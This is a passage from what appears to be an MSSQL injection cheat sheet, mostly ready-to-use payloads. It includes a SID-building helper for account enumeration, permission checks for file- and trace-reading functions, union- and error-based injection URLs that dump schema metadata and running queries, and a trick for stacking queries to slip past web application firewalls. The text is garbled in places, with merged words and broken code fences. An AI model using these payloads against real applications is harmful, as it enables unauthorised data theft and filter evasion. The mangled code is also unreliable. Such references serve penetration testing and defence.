defget_sid(n):domain ='0x0105000000000005150000001c00d1bcd181f1492bdfc236'user = struct.pack('<I', int(n))user = user.hex()returnf"{domain}{user}"#if n=1000, get SID of the user with ID 1000
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';# Or doingUsemaster;EXEC sp_helprotect 'fn_xe_file_target_read_file';
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';# Or doingUsemaster;EXEC sp_helprotect 'fn_get_audit_file';
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';# Or doingUsemaster;EXEC sp_helprotect 'fn_trace_gettabe';
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, ifnot provided with either, cannot be formatted asJSON. Here's an example of how this is done:```sql```markdownhttps://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
### Retrieving the Current Query
[Trick from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/).
For users granted the `VIEW SERVER STATE` permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:
```sql
```markdown
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
To check if you have the VIEW SERVER STATE permission, the following query can be used:
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
### WAF Bypass with unorthodox stacked queries
According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":
```sql
SELECT 'a' SELECT 'b'